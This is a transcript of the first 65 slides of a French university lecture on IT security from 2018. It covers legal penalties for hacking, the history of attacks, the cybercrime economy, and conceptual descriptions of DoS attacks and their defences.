la sécurité informatique rtai -...

187
La sécurité informatique RTAI Fabrice Prigent Université Toulouse 1 Capitole R.T.A.I. Jeudi 15 Février 2018 Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 1 / 187

Upload: trankien

Post on 12-Sep-2018

215 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La sécurité informatique RTAI

Fabrice Prigent

Université Toulouse 1 Capitole

R.T.A.I. Jeudi 15 Février 2018

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 1 / 187

Page 2: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

"Tu es fort petit, très fort, mais tant que je seraisdans le métier, tu ne seras jamais que le second."

The MASK

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 2 / 187

Page 3: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pirater n’est pas un jeu

Ce que vous apprendrez ici est destiné à la protection, pas àl’attaque. Mais si cela vous amuse :

Certains organismes "anodins" sont sous la protection de laDGSI ou pire...Quand vous réussissez à pirater un organisme c’est parce que

Il ne fait pas de sécuritéIl a une bonne sécurité, mais avec une faille. Il a donc desjournaux qu’il analyse.Vous avez piraté un Honeypot. Bravo vous êtes sousmicroscope.

Accord international G8-24Gel de situation de police à police,Regularisation judiciaire par la suite.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 3 / 187

Page 4: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Dura Lex Sed Lex

Accès et maintien :Pénal : Art 323-1 : 30 000 e, 2 ans de prisonsi en plus altération : 45 000 e, 3 ans de prisonsi en plus STAD de l’état : 75 000 e, 5 ans de prison

Entrave au système d’information :Pénal : Art 323-2 : 75 000 e, 5 ans de prison.si en plus STAD de l’état : 100 000 e, 7 ans de prison

Possession d’outils de piratage :Pénal : peines identiques aux infractions "possibles".

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 4 / 187

Page 5: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Dura Lex Sed Lex : résumé

Pour résumer"Pas vu, Pas prisVu : Niqué !"

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 5 / 187

Page 6: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Phrases essentielles

"Some rules can be bent,others.... can be broken."Morpheus"Ne pas croire ce que l’on te dit. Toujours re-vérifier" Gibbsrègle n°3"Ne jamais rien prendre pour acquis" Gibbs règle n°8"L’homme intelligent résoud les problèmes, l’homme sage lesévite"

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 6 / 187

Page 7: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Quel est l’objectif de la sécurité informatique ?

Protéger l’informatique ?Intégrité ?Confidentialité ?Disponibilité ?

Empêcher les accès aux utilisateurs ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 7 / 187

Page 8: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

En-êtes vous sûrs ?

Distribution d’un malware par votre serveur web ?Notion d ’imagePerte de marchéset pourtant aucun risque informatique

Vol / Destruction d’un serveur ?Protection physique (est-ce votre rôle ?)Sauvegarde

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 8 / 187

Page 9: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La bonne définition

Protéger l’entrepriseY compris sa version non informatique

Internet des objets (caméras,

Par des moyens informatiques

Si vous n’en êtes pas convaincus, essayez d’en convaincre vosinterlocuteurs.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 9 / 187

Page 10: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Comment faire

EvaluerLes difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?

Définir les rôles : politique de sécuritéQui fait quoi, comment et quand ?Qui peut faire quoi, comment et quand ?

Définir un plan d’actionQuelle sont les priorités ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 10 / 187

Page 11: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Évaluer

Les difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 11 / 187

Page 12: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les difficultés

Génère des désagrémentsL’empêcheur de surfer en rond.

Beaucoup de travailNécessite de fortes compétences

en réseau, en système, en droit, et une remise à niveaupermanente

Coûte de l’argentet ne rapporte rien

Pas de reconnaissanceSi ça marche : "A quoi ça sert ?"Sinon : "Vous êtes nuls !"

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 12 / 187

Page 13: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le contexte : Internet

HistoriqueConnexion de bout en boutRéseau ouvert

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 13 / 187

Page 14: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Historique

1962 : Réseau militaire1968 : Premiers tests réseau à paquets1 Octobre 1969 Arpanet(RFC,UNIX)Septembre 1978 : IPv41991 : Création de WWW par Tim Lee Werners1992 : Découverte d’Internet par le grand public

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 14 / 187

Page 15: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Connexion de bout en bout

les RFC 1122 et 1123 définissent les règles pour les machinesAccessibilité totaleOn fait ce que l’on dit, et l’on dit ce que l’on fait

Signaler quand cela ne marche pasSignaler pourquoi

Système ouvertFingerRexecSendmail

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 15 / 187

Page 16: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Réseau ouvert

Entraide : prêt de ressourcesSendmail → relayage de spamsDNS → saturation de serveurs distants

Assistance au débogageEXPN et VRFY de sendmail → collecte d’informationsXFER DNS → cartographie de réseaux

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 16 / 187

Page 17: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les risques

Destruction de donnéesPerte de marchésPerte de temps et donc d’argentRisques juridiques

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 17 / 187

Page 18: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Destruction de données

ComptabilitéDonnées clientsR & D, Conception, ProductionLes PME meurent dans les 3 mois.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 18 / 187

Page 19: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Perte de marché

Vol ou divulgation d’informationRecherche et développementFichier client

Dégradation de l’imageModification du site webDivulgation d’informations (vraies puis fausses)Perte de confiance

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 19 / 187

Page 20: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pertes financière et boursière

Exemple de Yahoo

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 20 / 187

Page 21: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pertes financière et boursière

Mais ce n’est pas toujours le cas

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 21 / 187

Page 22: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pertes financière et boursière

Cause ou conséquence ?

http://riskbasedsecurity.com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 22 / 187

Page 23: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Perte de temps et donc d’argent

Arrêt de la productionRecherche des causesRemise en état

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 23 / 187

Page 24: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Risques juridiques

Lois françaisesEchanges illégaux (terrorisme/pédopornographie/P2P),Attaques par rebond,Confidentialité des données personnelles (Article 226-17 etArticle 226-34),GDPR / RGPD (Directive européenne : 25 Mai 2018).

4% du chiffre d’affaire mondial10-20 millions d’euros pour les administrations

ContratsDisponibilité

Lois internationalesLoi Sarbanes-Oxley (US)Réglementation Bâle II

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 24 / 187

Page 25: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les menaces : attaques

HistoriqueNiveau des attaquesTypes d’attaqueDéroulement d’une attaque

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 25 / 187

Page 26: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : pré-historique

1975 : Jon Postel pressent le SPAM→ 1983 : blagues de potaches1983 : WargamesAoût 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.(0.75$)2 Novembre 1988 : Ver de Morris

10% du parc mondial (6000 sur 60000)Création du CERT

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 26 / 187

Page 27: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : historique

2001 : Code Rouge24 janvier 2003 : Slammer

(376 octets)doublait toutes les 2,5 secondes90% des hôtes vulnérables infectés en 10 minutes

2004 : Location de zombies2008 : Les Anonymous commencent leurs attaques

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 27 / 187

Page 28: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : contemporain

2009 : Conficker (7%, Militaire, 250 K$, MD6)2010 : Opération Aurora, Mariposa (13 M), Comodo, Stuxnet,etc.2011 : Affaire DigiNoTar (certificat *.google.com),2012 : Pacemakers, Piratage de l’Élysée,2013 : PRISM (Snowden), Backdoor DLink2014 : Cryptolocker, Shellshock(98), Sony, FIN4, Failles SSL(Poodle, Heartbleed)2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, AshleyMadison, Backdoor Cisco2016 : DNC, Méga DDos, IoT, Shadow Brokers2017 : Cryptominers, Equifax, Accenture, AWS public bucket,Wannacry

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 28 / 187

Page 29: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : 2018

Meltdown et spectre (Intel, ARM, etc.)Oneplus pownedIntel Powned (AMT)AMD Powned : Backdoor dans les Ryzen et EPIC : Masterkey,Chimera, Fallout, etc.Cisco powned (FW, VPN)Lenovo powned (Fingerprint scanner, wifi)Asus powned (commutateurs)Telegram et U+202EOlympic DestroyerAlerte sur les sites HTTP par chromeMemcached et son Ddos de 1,3 puis 1,7 Tbit/s (5 jours aprèsla découverte du pb).Trustico qui conserve les clés privées, et s’en fait voler 21.000.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 29 / 187

Page 30: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Cyberdjihadisme

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 30 / 187

Page 31: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : en temps réel

http://map.honeynet.org

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 31 / 187

Page 32: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : en temps réel 2

http://cybermap.kaspersky.com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 32 / 187

Page 33: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : en temps différé

http://zone-h.org

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 33 / 187

Page 34: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : en temps différé

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 34 / 187

Page 35: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les attaques : en devenir

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 35 / 187

Page 36: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Niveau des attaques

1980 1985 1990 1995 2005 2010 2015

Niveau

Essai de mots de passe

Code Auto-répliquant

Décryptage de mot de passe

Exploitation de vulnérabilités connues

Désactivation des journaux

Backdoor

Exploration de réseau (scan)

Détournement de sessions

Utilisation de SNMP

Interface graphique

Maquillage de paquets Déni de service

Attaques web

Techniques furtives

Obfuscation

Attaques distribuées Réseau C&C P2P

Phishing

Fast Flux

Crypto High tech

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 36 / 187

Page 37: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Type des attaquants : par compétence

Script Kiddy90% playstation 9% clickomane 1% intelligenceutilise ce que font les autres

AmateurFailles connuesFailles web

ProfessionnelEn équipeAvec beaucoup de moyens (financiers, techniques, parfoispréparatoires)0days possibles, voire courants.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 37 / 187

Page 38: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Type des attaquants : par objectif

L’argentpiratage volumétriquecryptolocker "killer application"

Hacktiviste"Terroriste"Anonymous

EspionsEtatiqueIndustriel

"Petit con"

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 38 / 187

Page 39: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Évolution des attaquants

Ne pas se méprendreLa moyenne des pirates est plus bête qu’avant.Mais les meilleurs pirates sont bien meilleurs qu’avant

plus psychologues (Social Engineering, virus)plus pragmatiques (Efficacité, Argent)plus techniques (Ingénieurs au chômage après éclatement de labulle internet)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 39 / 187

Page 40: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

But des attaques

Constitution d’un parc de zombiesCampagne de SPAMsCampagne de phishingCampagne de racket

TagCasseVol (codes bancaires, espionnage, marketing agressif)Spyware, Keylogger, cryptolocker etc.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 40 / 187

Page 41: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Économie Virale

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 41 / 187

Page 42: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Économie Virale : quelques chiffres

Faille inconnue(0 day)Faille iOS 10 payée 1,5 million de $ par Zérodium

Phreaking téléphonique : 2 000 - 70 000 $ par attaque réussie30% des américains ont acheté après un spamROI de "indian herbal" 0,1 cents pour 65 e3,5 $ pour une DoS de 1 heure et de 30 Gbit/sVol d’identité

Perte estimée pour le vol d’une identité : 400 e(bénéfice pourle pirate : entre 50 et 100 e))en 2007, l’estimation des pertes dues à la cybercriminalité étaitde plus de 1 milliard par an.

Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600milliards $Pourquoi les sites porno et les sites proxy sont gratuits ?

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 42 / 187

Page 43: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Proposition d’emploi

Mais actuellement les machines résolvent 99% des captchas.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 43 / 187

Page 44: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Prix de failles

https://zerodium.com/program.html

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 44 / 187

Page 45: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Prix de failles mobile

https://zerodium.com/program.html

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 45 / 187

Page 46: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Type des attaques

Déni de service (saturation, D.O.S. ou D.D.O.S.)Phishing, spear phishingInfection (cryptolocker, mots de passe bancaires).Piratage webIntrusion réseau (APT)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 46 / 187

Page 47: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaque D.O.S.

Deny Of Service ou Déni de service. Plusieurs principes defonctionnement

Le harcèlementOccupation permanente de la ligne

Le livreur de pizzasAppel de plusieurs livreurs pour une fausse adresseVoir backscatter pour le repérage

Le chewing gum dans la serrure

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 47 / 187

Page 48: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaque D.D.O.S.

Distributed Deny Of Service ou déni de service distribué.D.O.S. appliqué par plusieurs (dizaines de milliers de) machinesGénéralement de type "livreur de pizzas"Rarement évitable (même par des sociétés spécialisées)Exemple du 7ème spammeur avec 8Gbit/s en 2006.Volume maximal actuel : 1.35 Tbit/s par de serveursmemcached.http://atlas.arbor.net/summary/do

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 48 / 187

Page 49: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Type de D.O.S.

Saturation de la bande passante (UDP)10000 zombiesImpossible de lutter seul (se "cacher" derrière OVH,CloudFlare)

Saturation de la table des connexions (TCP)1000 zombiesLutte : utilisation des syncookies

Saturation du nombre processus100 zombies mais les machines sont "grillées", connaissanceminimaleLutte : limitation du nombre de processus, repérage et blocagetrès tôt

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 49 / 187

Page 50: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Type de D.O.S.

Saturation de la CPU10 zombies mais les machines sont "grillées", connaissancespointuesLutte : limitation de la CPU (noyau), mod_evasive (http)

Plantage distant1 zombie. Expertise nécessairePatch régulier, durcissement noyau, protection applicative

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 50 / 187

Page 51: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Et si kon ve fer mé kon sé pa

source http: // www. ddosservice. com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 51 / 187

Page 52: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Piske ma copine me quitte, je DDoS

sourcehttps: // pasillo. renater. fr/ weathermap/ weathermap_metropole. html

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 52 / 187

Page 53: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La protection DDoS

Elle se prépare, comme toute gestion de crise.Savoir ce que l’on est prêt à sacrifier (ou pas)

En terme de correspondantsEn terme de services

Les procéduresLes concevoir (qui fait quoi comment, les interlocuteurs)Les rédigerLes valider

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 53 / 187

Page 54: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La protection DDoS

Elle est multi-niveauxVolumétrique (FAI)Connexion (Réseau)Applicative (Développement)

Elle a ses risques propresPerte localisée de connexion (syncookie)Latence en régime de croisière (limitesCPU/process/RAM/disque)Risque d’interception "high level" : cloudflare / OVH / etc.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 54 / 187

Page 55: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque phishing

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 55 / 187

Page 56: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque infection

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 56 / 187

Page 57: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque infection / protection

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 57 / 187

Page 58: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque infection contournement

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 58 / 187

Page 59: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque intégration botnet

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 59 / 187

Page 60: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque infection pour Spam/Virus

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 60 / 187

Page 61: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’attaque infection pour DDoS

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 61 / 187

Page 62: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’un piratage web

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 62 / 187

Page 63: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’un piratage réseau

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 63 / 187

Page 64: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Déroulement d’une attaque intrusion

Collecte d’informationsRepérage des vulnérabilitésUtilisation des vulnérabilités → intrusionAccession aux droits administrateur (escalade)CamouflageInstallation d’une backdoor

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 64 / 187

Page 65: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Collecte des informations

Par "social engineering" ou manipulation psycho-relationnellePar ingénierie informationnellePar interrogation TCP/IP

Scan (de ports ou de machines)Rapide/lentClassique/furtif

Interrogation des servicesCartographie DNSRécupération des versionsRécupération des options

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 65 / 187

